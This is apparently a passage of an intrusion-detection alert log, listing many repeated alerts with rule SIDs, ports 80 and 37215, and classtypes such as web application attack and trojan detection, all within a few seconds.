              Source Port:45024
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.237678
              SID:2030092
              Source Port:37034
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.237774
              SID:2030092
              Source Port:60472
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.237649
              SID:2030092
              Source Port:45786
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252020
              SID:2835222
              Source Port:51288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252650
              SID:2829579
              Source Port:35458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256631
              SID:2835222
              Source Port:37794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267680
              SID:2030092
              Source Port:59680
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.247144
              SID:2025883
              Source Port:44808
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.275164
              SID:2835222
              Source Port:58472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.305803
              SID:2835222
              Source Port:50172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307832
              SID:2835222
              Source Port:46636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239596
              SID:2025883
              Source Port:51050
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.252809
              SID:2835222
              Source Port:53806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.259864
              SID:2829579
              Source Port:38666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.272625
              SID:2030092
              Source Port:34184
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.254930
              SID:2025883
              Source Port:55984
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.261368
              SID:2829579
              Source Port:45138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.246141
              SID:2030092
              Source Port:37370
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246254
              SID:2025883
              Source Port:32796
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.256904
              SID:2829579
              Source Port:58434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.273782
              SID:2829579
              Source Port:46148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307705
              SID:2835222
              Source Port:40474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238439
              SID:2025883
              Source Port:36208
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.255075
              SID:2829579
              Source Port:39874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.272495
              SID:2025883
              Source Port:45794
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.246218
              SID:2030092
              Source Port:47938
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.287840
              SID:2835222
              Source Port:54832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.305703
              SID:2835222
              Source Port:60002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.244111
              SID:2030092
              Source Port:53508
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.251062
              SID:2829579
              Source Port:48658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.260737
              SID:2835222
              Source Port:53226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261704
              SID:2835222
              Source Port:59268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307768
              SID:2835222
              Source Port:49984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241794
              SID:2025883
              Source Port:57298
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.247238
              SID:2025883
              Source Port:43374
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.252358
              SID:2835222
              Source Port:59700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252388
              SID:2829579
              Source Port:53196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.238572
              SID:2030092
              Source Port:56756
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.247074
              SID:2030092
              Source Port:45146
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.274230
              SID:2829579
              Source Port:55148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254379
              SID:2829579
              Source Port:34226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.260550
              SID:2835222
              Source Port:58116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266850
              SID:2030092
              Source Port:38112
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.254790
              SID:2025883
              Source Port:39154
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.259084
              SID:2835222
              Source Port:34116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261460
              SID:2835222
              Source Port:42000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267894
              SID:2030092
              Source Port:56332
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241729
              SID:2030092
              Source Port:34492
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.259125
              SID:2835222
              Source Port:53256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.244458
              SID:2030092
              Source Port:46316
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241765
              SID:2025883
              Source Port:50824
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.238811
              SID:2030092
              Source Port:56774
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.265151
              SID:2030092
              Source Port:51248
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246558
              SID:2025883
              Source Port:40260
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.260401
              SID:2835222
              Source Port:43740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238030
              SID:2025883
              Source Port:55740
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.275349
              SID:2835222
              Source Port:44912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240154
              SID:2025883
              Source Port:39420
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.265381
              SID:2030092
              Source Port:55890
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.258740
              SID:2829579
              Source Port:49574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266672
              SID:2025883
              Source Port:56944
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.253905
              SID:2835222
              Source Port:45198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.259243
              SID:2835222
              Source Port:34126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252981
              SID:2829579
              Source Port:60494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.262106
              SID:2829579
              Source Port:38672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240463
              SID:2030092
              Source Port:37714
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.267969
              SID:2030092
              Source Port:60874
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.262860
              SID:2829579
              Source Port:37250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267641
              SID:2030092
              Source Port:48436
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241078
              SID:2025883
              Source Port:55216
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.275510
              SID:2835222
              Source Port:38772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275830
              SID:2829579
              Source Port:40262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.272091
              SID:2030092
              Source Port:33304
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.275098
              SID:2835222
              Source Port:49218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.255251
              SID:2030092
              Source Port:47712
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.307898
              SID:2829579
              Source Port:54184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261204
              SID:2835222
              Source Port:42426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239887
              SID:2025883
              Source Port:54180
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.263691
              SID:2829579
              Source Port:57294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252700
              SID:2829579
              Source Port:47716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.237931
              SID:2030092
              Source Port:44742
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.268368
              SID:2030092
              Source Port:37426
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.253358
              SID:2835222
              Source Port:52420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256311
              SID:2829579
              Source Port:32974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255877
              SID:2829579
              Source Port:44130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255917
              SID:2829579
              Source Port:54086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238762
              SID:2025883
              Source Port:35140
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.264980
              SID:2030092
              Source Port:46430
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.266621
              SID:2030092
              Source Port:39892
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.240566
              SID:2025883
              Source Port:41472
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.253312
              SID:2835222
              Source Port:56290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241529
              SID:2025883
              Source Port:58654
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.239076
              SID:2030092
              Source Port:33318
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.275905
              SID:2835222
              Source Port:45842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.251796
              SID:2835222
              Source Port:57566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.245386
              SID:2025883
              Source Port:54684
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.261842
              SID:2835222
              Source Port:59374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.308392
              SID:2829579
              Source Port:60204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256434
              SID:2829579
              Source Port:44020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.306634
              SID:2829579
              Source Port:36014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.260686
              SID:2835222
              Source Port:57732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266938
              SID:2030092
              Source Port:60962
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254529
              SID:2829579
              Source Port:49572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239370
              SID:2030092
              Source Port:50474
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.241602
              SID:2025883
              Source Port:37588
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.275742
              SID:2829579
              Source Port:60068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266558
              SID:2030092
              Source Port:55906
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.238346
              SID:2030092
              Source Port:51142
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.256517
              SID:2835222
              Source Port:55302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.264950
              SID:2030092
              Source Port:50738
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.263651
              SID:2835222
              Source Port:54962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.253534
              SID:2829579
              Source Port:43954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307074
              SID:2835222
              Source Port:58850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.260266
              SID:2829579
              Source Port:50294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.244182
              SID:2025883
              Source Port:56476
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.238560
              SID:2025883
              Source Port:43196
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.273948
              SID:2835222
              Source Port:47462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.260509
              SID:2835222
              Source Port:60104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.240412
              SID:2030092
              Source Port:35516
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.273650
              SID:2835222
              Source Port:39250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274543
              SID:2835222
              Source Port:38888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.244830
              SID:2030092
              Source Port:54968
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246394
              SID:2030092
              Source Port:33772
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.244662
              SID:2030092
              Source Port:52258
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.244374
              SID:2030092
              Source Port:38836
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.307552
              SID:2829579
              Source Port:60622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274464
              SID:2835222
              Source Port:35470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.265477
              SID:2030092
              Source Port:59410
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.253379
              SID:2829579
              Source Port:58048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255789
              SID:2835222
              Source Port:45840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.262354
              SID:2835222
              Source Port:57030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.253732
              SID:2835222
              Source Port:59608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255976
              SID:2829579
              Source Port:41036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.247444
              SID:2025883
              Source Port:38426
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.241044
              SID:2030092
              Source Port:45540
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.251192
              SID:2829579
              Source Port:37366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.308533
              SID:2835222
              Source Port:35508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274260
              SID:2835222
              Source Port:60032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.238659
              SID:2030092
              Source Port:35842
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252168
              SID:2829579
              Source Port:49194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.254604
              SID:2025883
              Source Port:51930
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.237830
              SID:2030092
              Source Port:36480
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241576
              SID:2030092
              Source Port:45266
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.239684
              SID:2025883
              Source Port:40992
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.238640
              SID:2030092
              Source Port:53032
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.263203
              SID:2835222
              Source Port:50546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254259
              SID:2829579
              Source Port:59806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.263437
              SID:2829579
              Source Port:44642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267467
              SID:2030092
              Source Port:51868
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254454
              SID:2835222
              Source Port:47530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256952
              SID:2835222
              Source Port:37148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.288015
              SID:2829579
              Source Port:41204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274796
              SID:2835222
              Source Port:40428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266347
              SID:2030092
              Source Port:45156
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.261256
              SID:2829579
              Source Port:46470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.287413
              SID:2829579
              Source Port:60892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.240600
              SID:2025883
              Source Port:38122
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.241554
              SID:2025883
              Source Port:43640
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.266713
              SID:2030092
              Source Port:50786
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.237960
              SID:2030092
              Source Port:41606
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.307937
              SID:2835222
              Source Port:38026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241504
              SID:2025883
              Source Port:54708
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.255002
              SID:2025883
              Source Port:55288
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.307586
              SID:2835222
              Source Port:41184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.240074
              SID:2030092
              Source Port:38306
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241186
              SID:2025883
              Source Port:42926
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.239931
              SID:2025883
              Source Port:35692
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.246953
              SID:2030092
              Source Port:48018
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241304
              SID:2030092
              Source Port:42066
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.253050
              SID:2829579
              Source Port:54402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.246833
              SID:2030092
              Source Port:47804
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246876
              SID:2025883
              Source Port:49412
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.253169
              SID:2835222
              Source Port:41296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.251714
              SID:2835222
              Source Port:55452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.255180
              SID:2030092
              Source Port:32818
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252117
              SID:2835222
              Source Port:36204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274985
              SID:2829579
              Source Port:39966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239112
              SID:2030092
              Source Port:53466
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.307106
              SID:2829579
              Source Port:41680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.265828
              SID:2030092
              Source Port:53224
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252555
              SID:2829579
              Source Port:49600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261076
              SID:2829579
              Source Port:44092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275278
              SID:2829579
              Source Port:36160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274661
              SID:2829579
              Source Port:58694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.231937
              SID:2030092
              Source Port:59916
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.266035
              SID:2030092
              Source Port:34700
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.275029
              SID:2835222
              Source Port:52246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239986
              SID:2030092
              Source Port:44968
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.245550
              SID:2025883
              Source Port:41354
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.307965
              SID:2829579
              Source Port:41492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239284
              SID:2030092
              Source Port:53154
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246172
              SID:2030092
              Source Port:58268
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.275592
              SID:2835222
              Source Port:58496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.245947
              SID:2030092
              Source Port:52912
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.240726
              SID:2030092
              Source Port:50846
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254417
              SID:2829579
              Source Port:33544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240394
              SID:2025883
              Source Port:49442
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.239412
              SID:2030092
              Source Port:54284
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
